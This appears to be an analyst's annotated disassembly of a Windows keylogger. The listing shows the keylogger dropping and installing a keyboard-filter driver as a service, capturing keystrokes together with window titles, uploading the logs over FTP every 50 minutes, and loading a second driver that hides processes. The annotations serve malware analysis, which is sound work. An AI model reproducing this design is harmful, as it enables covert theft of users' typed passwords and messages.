00401E12 call [<&KERNEL32.LockResource>] ; KERNEL32.LockResource  pointer to the resource bytes
00401E18 mov [ebp-1C],eax
00401E1B cmp dword ptr [ebp-1C],0
00401E1F jnz short 00401E26 ; got a pointer -> continue
00401E21 jmp 004023B0 ; otherwise return -1
00401E26 mov edx,[ebp-390]
00401E2C push edx
00401E2D mov eax,[ebp-18]
00401E30 push eax
00401E31 call [<&KERNEL32.SizeofResource>] ; KERNEL32.SizeofResource  resource size
00401E37 mov [ebp-4A0],eax
00401E3D mov ecx,[<&MSVCIRT.filebuf::openprot>] ; MSVCIRT.filebuf::openprot
00401E43 mov edx,[ecx]
00401E45 push edx
00401E46 push 8A
00401E4B mov eax,[40455C]
00401E50 push eax
00401E51 lea ecx,[ebp-380]
00401E57 call [<&MSVCIRT.fstream::open>] ; open the driver file for writing
00401E5D mov ecx,[ebp-380]
00401E63 mov edx,[ecx+4]
00401E66 lea ecx,[ebp+edx-380]
00401E6D call [<&MSVCIRT.ios::fail>] ; MSVCIRT.ios::fail
00401E73 test eax,eax
00401E75 je short 00401E7C ; opened -> continue
00401E77 jmp 004023B0 ; otherwise return -1
00401E7C mov eax,[ebp-4A0]
00401E82 push eax
00401E83 mov ecx,[ebp-1C]
00401E86 push ecx
00401E87 lea ecx,[ebp-374]
00401E8D call [<&MSVCIRT.ostream::write>] ; MSVCIRT.ostream::write  write the driver image
00401E93 lea ecx,[ebp-380]
00401E99 call [<&MSVCIRT.fstream::close>] ; MSVCIRT.fstream::close
;------------------------------------------------------; install and start the service ----------------------------
00401E9F push 0F003F ; SC_MANAGER_ALL_ACCESS
00401EA4 push 0
00401EA6 push 0
00401EA8 call [<&ADVAPI32.OpenSCManagerA>] ; open the service control manager
00401EAE mov [ebp-14],eax
00401EB1 cmp dword ptr [ebp-14],0
00401EB5 jnz short 00401EC9 ; opened -> continue
00401EB7 mov edx,[40455C] ; otherwise delete the driver file and return -1
00401EBD push edx
00401EBE call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA
00401EC4 jmp 004023B0
00401EC9 mov eax,[40455C]
00401ECE push eax ; driver path
00401ECF mov ecx,[404260] ; service name (global pointer)
00401ED5 push ecx
00401ED6 mov edx,[ebp-14]
00401ED9 push edx
00401EDA call 004013EC ; install the service (body not in this listing)
00401EDF add esp,0C
00401EE2 mov [ebp-38C],eax
00401EE8 cmp dword ptr [ebp-38C],0
00401EEF jnz short 00401F02 ; installed -> continue
00401EF1 mov eax,[40455C] ; otherwise delete the file and return -1
00401EF6 push eax
00401EF7 call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA
00401EFD jmp 004023B0
00401F02 mov ecx,[404260] ; kblog.00404264
00401F08 push ecx
00401F09 mov edx,[ebp-14]
00401F0C push edx ;
00401F0D call 0040143B ; start the service (body not in this listing)
00401F12 add esp,8 ;
00401F15 mov [ebp-38C],eax
00401F1B cmp dword ptr [ebp-38C],0
00401F22 jnz short 00401F35 ; started -> continue
00401F24 mov eax,[40455C] ; otherwise delete the file and return -1
00401F29 push eax
00401F2A call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA
00401F30 jmp 004023B0 ;
00401F35 mov ecx,[40455C]
00401F3B push ecx
00401F3C call [<&KERNEL32.DeleteFileA>] ; KERNEL32.DeleteFileA  kbdrv.sys is deleted once the service is running
;------------------------------------------------------; initialise the log path and temp file name ---
00401F42 push 100
00401F47 push 0
00401F49 lea edx,[ebp-6B0]
00401F4F push edx
00401F50 call ; memset: clear the path buffer
00401F55 add esp,0C
00401F58 lea eax,[ebp-6B0]
00401F5E push eax
00401F5F push 100
00401F64 call [<&KERNEL32.GetTempPathA>] ; KERNEL32.GetTempPathA  %TEMP%
00401F6A push 100
00401F6F push 0
00401F71 lea ecx,[ebp-5A8]
00401F77 push ecx
00401F78 call ; memset: clear the file-name buffer
00401F7D add esp,0C
00401F80 lea edx,[ebp-5A8]
00401F86 push edx
00401F87 push 0
00401F89 push 0
00401F8B lea eax,[ebp-6B0]
00401F91 push eax
00401F92 call [<&KERNEL32.GetTempFileNameA>] ; KERNEL32.GetTempFileNameA  the log is a freshly created temp file (no prefix)
00401F98 lea ecx,[ebp-214]
00401F9E push ecx
00401F9F push 2
00401FA1 call [<&WS2_32.#115>] ; WS2_32.WSAStartup
00401FA7 test eax,eax
00401FA9 jnz 00402053 ; Winsock init failed -> skip the host record
;------------------------------------------------------; record host name and IP ------------------------------
00401FAF push 100 ;
00401FB4 lea edx,[ebp-318]
00401FBA push edx
00401FBB call [<&WS2_32.#57>] ; WS2_32.gethostname
00401FC1 test eax,eax
00401FC3 jnz 0040204D ; failed -> skip
00401FC9 lea eax,[ebp-318]
00401FCF push eax
00401FD0 call [<&WS2_32.#52>] ; WS2_32.gethostbyname
00401FD6 mov [ebp-394],eax
00401FDC cmp dword ptr [ebp-394],0 ;
00401FE3 je short 0040204D ; failed -> skip
00401FE5 mov ecx,[ebp-394]
00401FEB mov edx,[ecx+C] ; hostent->h_addr_list
00401FEE mov eax,[edx]
00401FF0 mov ecx,[eax] ; first IPv4 address
00401FF2 push ecx
00401FF3 call [<&WS2_32.#12>] ; WS2_32.inet_ntoa
00401FF9 mov [ebp-4A8],eax
00401FFF push 004042F0 ; ASCII "---"  record separator
00402004 lea edx,[ebp-318]
0040200A push edx
0040200B call [<&KERNEL32.lstrcatA>] ; KERNEL32.lstrcatA
00402011 mov eax,[ebp-4A8]
00402017 push eax
00402018 lea ecx,[ebp-318]
0040201E push ecx
0040201F call [<&KERNEL32.lstrcatA>] ; KERNEL32.lstrcatA  "<host>---<ip>"
00402025 push 004042F4 ; trailing string (contents not shown in the paste)
0040202A lea edx,[ebp-318] ;
00402030 push edx
00402031 call [<&KERNEL32.lstrcatA>] ; KERNEL32.lstrcatA
00402037 lea eax,[ebp-5A8]
0040203D push eax
0040203E lea ecx,[ebp-318]
00402044 push ecx
00402045 call 004015A9 ; log the host record
0040204A add esp,8
;---------------------------------------------------------------------------------------------------------
0040204D call [<&WS2_32.#116>] ; WS2_32.WSACleanup
00402053 push 0
00402055 push 80 ; FILE_ATTRIBUTE_NORMAL
0040205A push 3 ; OPEN_EXISTING
0040205C push 0
0040205E push 0
00402060 push C0000000 ; GENERIC_READ|GENERIC_WRITE
00402065 push 004042F8 ; ASCII "\\.\kbdev"  device exposed by the keyboard-filter driver
0040206A call [<&KERNEL32.CreateFileA>] ; KERNEL32.CreateFileA
00402070 mov [ebp-10],eax
00402073 cmp dword ptr [ebp-10],-1
00402077 je 0040234C ; no device -> cleanup and return 0
0040207D call [<&KERNEL32.GetCurrentThreadId>] ; KERNEL32.GetCurrentThreadId
00402083 mov [ebp-398],eax
00402089 call [<&KERNEL32.GetTickCount>] ; KERNEL32.GetTickCount
0040208F mov [ebp-388],eax ; tick of the last upload
00402095 mov edx,1 ; while(TRUE) — loop body runs to 00402347
0040209A test edx,edx
0040209C je 0040234C ; never taken (edx is always 1)
004020A2 call [<&USER32.GetForegroundWindow>] ; USER32.GetForegroundWindow
004020A8 mov [ebp-AC4],eax ; current foreground window
004020AE call [<&USER32.GetFocus>] ; USER32.GetFocus  focus control (meaningful only after the AttachThreadInput below)
004020B4 mov [ebp-218],eax
004020BA call [<&KERNEL32.GetTickCount>] ; KERNEL32.GetTickCount
004020C0 mov [ebp-6C0],eax
004020C6 mov eax,[ebp-6C0]
004020CC sub eax,[ebp-388] ; ms since the last upload
004020D2 cmp eax,2DC6C0
004020D7 jb 00402168 ; less than 50 min (0x2DC6C0 ms) -> no upload this round
004020DD lea ecx,[ebp-5A8] ; otherwise upload the log over FTP
004020E3 push ecx
004020E4 call 00401719 ;
004020E9 add esp,4
004020EC test eax,eax
004020EE je short 0040215C ; upload failed -> only restart the timer, keep the file
;------------------------------------------------------; on success: pick a new temp log file and ----------------------
;------------------------------------------------------; re-record the host name and IP ----------------------
004020F0 push 100
004020F5 push 0
004020F7 lea edx,[ebp-6B0]
004020FD push edx
004020FE call ; memset
00402103 add esp,0C
00402106 lea eax,[ebp-6B0]
0040210C push eax
0040210D push 100
00402112 call [<&KERNEL32.GetTempPathA>] ; KERNEL32.GetTempPathA
00402118 push 100
0040211D push 0
0040211F lea ecx,[ebp-5A8]
00402125 push ecx
00402126 call ; memset
0040212B add esp,0C
0040212E lea edx,[ebp-5A8]
00402134 push edx
00402135 push 0
00402137 push 0
00402139 lea eax,[ebp-6B0] ; temp path (OllyDbg's stale "Arg2 => kbdrv" note did not belong here)
0040213F push eax
00402140 call [<&KERNEL32.GetTempFileNameA>] ; KERNEL32.GetTempFileNameA
00402146 lea ecx,[ebp-5A8]
0040214C push ecx
0040214D lea edx,[ebp-318]
00402153 push edx
00402154 call 004015A9 ; log the host record again into the new file
00402159 add esp,8
;---------------------------------------------------------------------------------------------------------
0040215C call [<&KERNEL32.GetTickCount>] ; KERNEL32.GetTickCount
00402162 mov [ebp-388],eax ; restart the 50-minute timer
00402168 mov eax,[ebp-AC4] ; foreground window
0040216E cmp eax,[ebp-6BC] ; previous foreground window (saved at 00402327)
00402174 je short 004021C5 ; unchanged -> skip the thread re-attach
00402176 cmp dword ptr [ebp-4A4],0
0040217D je short 00402195 ; no previous thread attached -> skip the detach
0040217F push 0 ; otherwise detach from the previous window's thread
00402181 mov ecx,[ebp-4A4]
00402187 push ecx
00402188 mov edx,[ebp-398]
0040218E push edx
0040218F call [<&USER32.AttachThreadInput>] ; USER32.AttachThreadInput
00402195 lea eax,[ebp-5B0]
0040219B push eax
0040219C mov ecx,[ebp-AC4]
004021A2 push ecx
004021A3 call [<&USER32.GetWindowThreadProcessId>>; thread id of the foreground window
004021A9 mov [ebp-4A4],eax
004021AF push 1
004021B1 mov edx,[ebp-4A4]
004021B7 push edx
004021B8 mov eax,[ebp-398]
004021BE push eax
004021BF call [<&USER32.AttachThreadInput>] ; attach to the foreground thread's input so GetFocus can report its focus control
004021C5 cmp dword ptr [ebp-AC4],0
004021CC je 004022F9 ; no foreground window -> skip to the state update
004021D2 push 100 ; fetch the window title
004021D7 push 00404564 ; global 0x100-byte title buffer
004021DC mov ecx,[ebp-AC4]
004021E2 push ecx
004021E3 call [<&USER32.GetWindowTextA>] ; USER32.GetWindowTextA
004021E9 mov edx,1
004021EE test edx,edx
004021F0 je 004022F9 ; never taken
004021F6 mov eax,[ebp-AC4]
004021FC cmp eax,[ebp-6BC]
00402202 jnz short 0040223B ; foreground window changed -> skip the focus check
00402204 mov ecx,[ebp-218]
0040220A cmp ecx,[ebp-5AC]
00402210 je short 0040223B ; focus control unchanged -> skip
00402212 push 0 ; lpOverlapped
00402214 lea edx,[ebp-39C]
0040221A push edx ; lpBytesReturned
0040221B push 0
0040221D push 0
0040221F push 0
00402221 push 0
00402223 push 80102187 ; IoControlCode
00402228 mov eax,[ebp-10] ; hDevice
0040222B push eax
0040222C call [<&KERNEL32.DeviceIoControl>] ; IOCTL 80102187: per the analyst, makes the driver insert a line-break marker into the scan-code stream (focus moved to another control)
00402232 test eax,eax
00402234 jnz short 0040223B ; ok -> continue
00402236 jmp 0040234C ; otherwise leave the loop
0040223B mov ecx,[ebp-AC4] ;
00402241 cmp ecx,[ebp-6BC] ;
00402247 je 004022F9 ; foreground window unchanged -> skip
0040224D push 0 ; otherwise read the buffered scan codes from the driver
0040224F lea edx,[ebp-39C]
00402255 push edx ; lpBytesReturned
00402256 push 400 ; nOutBufferSize
0040225B lea eax,[ebp-AC0] ;
00402261 push eax ; lpOutBuffer
00402262 push 400
00402267 lea ecx,[ebp-AC0]
0040226D push ecx ; lpInBuffer
0040226E push 80102184 ; IoControlCode
00402273 mov edx,[ebp-10]
00402276 push edx
00402277 call [<&KERNEL32.DeviceIoControl>] ; IOCTL 80102184: copy the driver's scan-code buffer into [ebp-AC0]
0040227D test eax,eax
0040227F jnz short 00402286 ; ok -> continue
00402281 jmp 0040234C ; otherwise leave the loop
00402286 mov eax,[ebp-AC0] ; first 16-bit scan code
0040228C and eax,0FFFF
00402291 test eax,eax
00402293 je short 004022F9 ; nothing buffered -> skip logging
00402295 lea ecx,[ebp-5A8]
0040229B push ecx
0040229C push 00404664 ; title of the previous window (copied at 00402337)
004022A1 call 004015A9 ; log the window title the keys were typed into
004022A6 add esp,8
004022A9 lea edx,[ebp-5A8]
004022AF push edx
004022B0 push 00404304 ; ASCII CR,LF
004022B5 call 004015A9 ; log a line break
004022BA add esp,8
004022BD lea eax,[ebp-5A8]
004022C3 push eax
004022C4 lea ecx,[ebp-AC0]
004022CA push ecx
004022CB call 004014BA ; decode and log the scan codes
004022D0 add esp,8
004022D3 push 0
004022D5 lea edx,[ebp-39C] ;
004022DB push edx
004022DC push 0
004022DE push 0
004022E0 push 0
004022E2 push 0 ;
004022E4 push 80102180
004022E9 mov eax,[ebp-10] ;
004022EC push eax
004022ED call [<&KERNEL32.DeviceIoControl>] ; IOCTL 80102180: clear the driver's scan-code buffer
004022F3 test eax,eax
004022F5 jnz short 004022F9 ; ok -> continue
004022F7 jmp short 0040234C ; otherwise leave the loop
004022F9 mov ecx,[ebp-5AC]
004022FF cmp ecx,[ebp-218]
00402305 je short 00402313 ; focus control unchanged -> skip
00402307 mov edx,[ebp-218] ; otherwise remember the focus control
0040230D mov [ebp-5AC],edx
00402313 mov eax,[ebp-AC4]
00402319 cmp eax,[ebp-6BC]
0040231F je short 0040233F ; foreground window unchanged -> skip
00402321 mov ecx,[ebp-AC4] ; remember the foreground window
00402327 mov [ebp-6BC],ecx
0040232D push 00404564
00402332 push 00404664
00402337 call ; strcpy: keep the new title in 00404664 for the next log entry
0040233C add esp,8
0040233F push 1
00402341 call [<&KERNEL32.Sleep>] ; KERNEL32.Sleep 1 ms — a near-busy poll; the constant GetForegroundWindow/DeviceIoControl churn is a behavioural tell
00402347 jmp 00402095 ; back to the loop head
0040234C cmp dword ptr [ebp-4A4],0
00402353 je short 0040236B ; nothing attached -> skip
00402355 push 0 ; otherwise detach thread input
00402357 mov edx,[ebp-4A4]
0040235D push edx
0040235E mov eax,[ebp-398]
00402364 |push eax
00402365 call [<&USER32.AttachThreadInput>] ; USER32.AttachThreadInput
0040236B cmp dword ptr [ebp-10],0
0040236F je short 0040237B ; skip if 0 (a failed CreateFileA leaves -1 here, so that case still reaches CloseHandle)
00402371 mov ecx,[ebp-10] ; otherwise close the device handle
00402374 push ecx
00402375 call [<&KERNEL32.CloseHandle>] ; KERNEL32.CloseHandle
;------------------------------------------------------; destroy both fstream objects, return 0 -----------------------------------
0040237B mov dword ptr [ebp-AC8],0
00402385 mov byte ptr [ebp-4],0
00402389 lea ecx,[ebp-380]
0040238F call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor'
00402395 mov dword ptr [ebp-4],-1
0040239C |lea ecx,[ebp-84]
004023A2 call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor'
004023A8 mov eax,[ebp-AC8]
004023AE |jmp short 004023E3 ; common epilogue
;------------------------------------------------------; destroy both fstream objects, return -1 -----------------------------------
004023B0 mov dword ptr [ebp-ACC],-1
004023BA |mov byte ptr [ebp-4],0 ;
004023BE lea ecx,[ebp-380]
004023C4 call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor'
004023CA mov dword ptr [ebp-4],-1
004023D1 lea ecx,[ebp-84]
004023D7 |call [<&MSVCIRT.fstream::`vbase destruc>; MSVCIRT.fstream::`vbase destructor'
004023DD mov eax,[ebp-ACC]
004023E3 mov ecx,[ebp-C]
004023E6 mov fs:[0],ecx ; pop the SEH frame
004023ED mov esp,ebp
004023EF |pop ebp ;
004023F0 |retn ;
;------------------------------------------------------; driver loader ---------------------------------------------
; int load_driver()   [004023F1]
; Builds "<cwd>" + string 00404308 + "msdtx.sys" into [ebp-11C] and calls
; 0040122F("msdirectx", path, &[ebp-120], &[ebp-14]) — 0040122F is not in this listing, presumably the
; service-create/start helper that returns a device handle in [ebp-120].
; Returns 0 (from [ebp-18]) on success, with [404764] = 1 and [404244] = the handle; returns 0 without
; doing anything when [404764] is already set. On failure it prints "Unable to Load Driver", throws the
; status as a C++ exception, and the catch block at 0040250E prints the FormatMessage text and returns -1.
004023F1 push ebp
004023F2 mov ebp,esp
004023F4 push -1
004023F6 push 0040268B ; SEH frame install (handler 0040268B)
004023FB mov eax,fs:[0]
00402401 |push eax
00402402 mov fs:[0],esp
00402409 |push ecx
0040240A |sub esp,120
00402410 |push ebx
00402411 push esi
00402412 push edi
00402413 mov [ebp-10],esp
00402416 |mov dword ptr [ebp-18],0 ; success return value
0040241D |mov dword ptr [ebp-120],-1 ; handle out-param for 0040122F, -1 = not set
00402427 cmp dword ptr [404764],0
0040242E je short 00402438
00402430 mov eax,[ebp-18]
00402433 jmp 00402592 ; already loaded -> return 0 at once
00402438 |mov dword ptr [ebp-4],0
0040243F lea eax,[ebp-11C]
00402445 push eax
00402446 push 104 ; MAX_PATH
0040244B |call [<&KERNEL32.GetCurrentDirectoryA>] ; KERNEL32.GetCurrentDirectoryA
00402451 |test eax,eax
00402453 je short 004024AD ; no directory -> path buffer is left uninitialised and passed on as-is
00402455 lea ecx,[ebp-11C]
0040245B push ecx
0040245C call ; strlen
00402461 add esp,4
00402464 mov edx,104
00402469 sub edx,eax ; remaining room
0040246B push edx
0040246C |push 00404308 ; string at 00404308 (contents not shown in the paste)
00402471 lea eax,[ebp-11C]
00402477 push eax
00402478 call [<&MSVCRT.strncat>] ; MSVCRT.strncat
0040247E add esp,0C
00402481 |lea ecx,[ebp-11C]
00402487 push ecx
00402488 |call ; strlen
0040248D add esp,4
00402490 mov edx,104
00402495 sub edx,eax
00402497 push edx
00402498 push 00404254 ; ASCII "msdtx.sys"
0040249D lea eax,[ebp-11C]
004024A3 push eax
004024A4 call [<&MSVCRT.strncat>] ; MSVCRT.strncat  path = "<cwd>" + 00404308 + "msdtx.sys"
004024AA add esp,0C
004024AD |lea ecx,[ebp-14]
004024B0 push ecx ; out: status value
004024B1 lea edx,[ebp-120]
004024B7 push edx ; out: driver handle
004024B8 |lea eax,[ebp-11C]
004024BE push eax ; driver path
004024BF push 00404248 ; ASCII "msdirectx"  presumably the service/device name for the driver
004024C4 call 0040122F ; load the driver (body not in this listing)
004024C9 add esp,10
004024CC |cmp dword ptr [ebp-120],-1
004024D3 jnz short 00402501 ; handle set -> success path
004024D5 push 0040430C ; ASCII "Unable to Load Driver"
004024DA |push 00404458 ; format string (contents not shown)
004024DF call ; printf-style output (target lost in the paste)
004024E4 |add esp,8
004024E7 |mov ecx,[ebp-14]
004024EA mov [ebp-12C],ecx
004024F0 push 00403260 ; type descriptor
004024F5 |lea edx,[ebp-12C]
004024FB push edx ; &thrown object (the status value)
004024FC |call ; _CxxThrowException via thunk 00402638 — throws the status; caught at 0040250E
00402501 mov eax,[ebp-120]
00402507 mov [404244],eax ; global driver handle, used by 004025A3
0040250C jmp short 0040257E
0040250E mov dword ptr [ebp-124],0 ; catch block: format and print the error, return -1
00402518 push 0
0040251A push 0
0040251C lea ecx,[ebp-124]
00402522 push ecx ; lpBu
ffer (receives a LocalAlloc'd string)
00402523 push 400
00402528 mov edx,[ebp-128]
0040252E push edx ; dwMessageId = the caught status value
0040252F push 0
00402531 |push 1300 ; FORMAT_MESSAGE_ALLOCATE_BUFFER|FROM_SYSTEM|IGNORE_INSERTS
00402536 call [<&KERNEL32.FormatMessageA>] ; KERNEL32.FormatMessageA
0040253C mov eax,[ebp-124]
00402542 push eax
00402543 push 00404458
00402548 call ; printf-style output
0040254D add esp,8
00402550 |cmp dword ptr [ebp-124],0
00402557 je short 00402566
00402559 mov ecx,[ebp-124]
0040255F |push ecx
00402560 call [<&KERNEL32.LocalFree>] ; KERNEL32.LocalFree
00402566 |mov dword ptr [ebp-130],-1
00402570 |mov eax,00402576 ; MSVC catch-block exit: continuation address returned to the EH runtime
00402575 retn
00402576 mov eax,[ebp-130] ; -1
0040257C jmp short 00402592
0040257E mov dword ptr [ebp-4],-1
00402585 mov dword ptr [404764],1 ; mark the driver as loaded
0040258F mov eax,[ebp-18] ; 0
00402592 mov ecx,[ebp-C]
00402595 |mov fs:[0],ecx ; pop the SEH frame
0040259C pop edi
0040259D |pop esi
0040259E pop ebx
0040259F |mov esp,ebp
004025A1 pop ebp
004025A2 retn
;------------------------------------------------------; hide-process request ---------------------------------------------
; int __cdecl hide_process(DWORD pid)   [004025A3]
; Sends IOCTL 2A7B8008 to the driver handle in [404244] with the 4-byte PID at [ebp+8] as input buffer.
; Returns DeviceIoControl's result; returns 0x15 without calling when [404764] says the driver is not loaded
; (non-zero, so the caller at 00401D66 treats that as success).
004025A3 push ebp
004025A4 mov ebp,esp
004025A6 |sub esp,8
004025A9 cmp dword ptr [404764],0
004025B0 jnz short 004025B9 ; driver loaded -> send the request
004025B2 mov eax,15 ; otherwise return 0x15
004025B7 |jmp short 004025E1
004025B9 push 0 ; lpOverlapped
004025BB lea eax,[ebp-4]
004025BE push eax ; lpBytesReturned
004025BF |push 0 ; nOutBufferSize
004025C1 |push 0 ; lpOutBuffer
004025C3 |push 4 ; nInBufferSize
004025C5 lea ecx,[ebp+8]
004025C8 push ecx ; lpInBuffer = &pid
004025C9 |push 2A7B8008 ; IoControlCode
004025CE mov edx,[404244]
004025D4 push edx ; hDevice
004025D5 call [<&KERNEL32.DeviceIoControl>] ; KERNEL32.DeviceIoControl
004025DB mov [ebp-8],eax
004025DE mov eax,[ebp-8]
004025E1 mov esp,ebp
004025E3 |pop ebp
004025E4 retn
;------------------------------------------------------; import thunks, EH funclets and padding ---------------------------------------------
004025E5 int3
004025E6 jmp [<&MSVCRT.operator delete>] ; MSVCRT.operator delete
004025EC jmp [<&MSVCRT.operator new>] ; MSVCRT.operator new[]
004025F2 jmp [<&MSVCRT.strlen>] ; MSVCRT.strlen
004025F8 jmp [<&MSVCRT.strcpy>] ; MSVCRT.strcpy  (the "call ; \strcpy" sites above go through this thunk)
004025FE jmp [<&MSVCRT.__CxxFrameHandler>] ; MSVCRT.__CxxFrameHandler
00402604 int3
00402605 int3
00402606 |int3
00402607 int3
00402608 int3
00402609 |int3
0040260A int3
0040260B |int3
0040260C int3
0040260D int3
0040260E int3
0040260F int3
00402610 jmp [<&MSVCRT.strcat>] ; MSVCRT.strcat
00402616 jmp [<&MSVCRT.memset>] ; MSVCRT.memset
0040261C push esi ; looks like an MSVC scalar deleting destructor: this = ecx, [esp+8] bit 0 = also free
0040261D mov esi,ecx
0040261F call ; destructor (target lost in the paste)
00402624 test byte ptr [esp+8],1
00402629 je short 00402632
0040262B push esi
0040262C call ; presumably operator delete (target lost in the paste)
00402631 pop ecx
00402632 mov eax,esi
00402634 pop esi
00402635 retn 4
00402638 jmp [<&MSVCRT._CxxThrowException>] ; MSVCRT._CxxThrowException
0040263E jmp [<&MSVCRT.type_info::~type_info>] ; MSVCRT.type_info::~type_info
00402644 int3
00402645 int3
00402646 int3
00402647 int3
00402648 int3
00402649 int3
0040264A int3
0040264B int3
0040264C int3
0040264D int3
0040264E int3
0040264F int3
00402650 lea ecx,[ebp-170] ; unwind funclet for 004015A9: destroy its fstream
00402656 call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor'
0040265C retn
0040265D mov eax,00403188 ; EH handler for 004015A9 (presumably FuncInfo at 00403188, then __CxxFrameHandler)
00402662 jmp ; target lost in the paste
00402667 lea ecx,[ebp-84] ; unwind funclet for main: destroy [ebp-84]
0040266D call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor'
00402673 retn
00402674 lea ecx,[ebp-380] ; unwind funclet for main: destroy [ebp-380]
0040267A call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor'
00402680 retn
00402681 mov eax,004031B0 ; EH handler for main (presumably FuncInfo at 004031B0)
00402686 jmp ; target lost in the paste
0040268B mov eax,004031E0 ; EH handler for 004023F1 (presumably FuncInfo at 004031E0)
00402690 jmp ; target lost in the paste
00402695 add [eax],al ; zero padding (00 00 ...) shown as code
00402697 add [eax],al
00402699 add [eax],al
0040269B add [eax],al
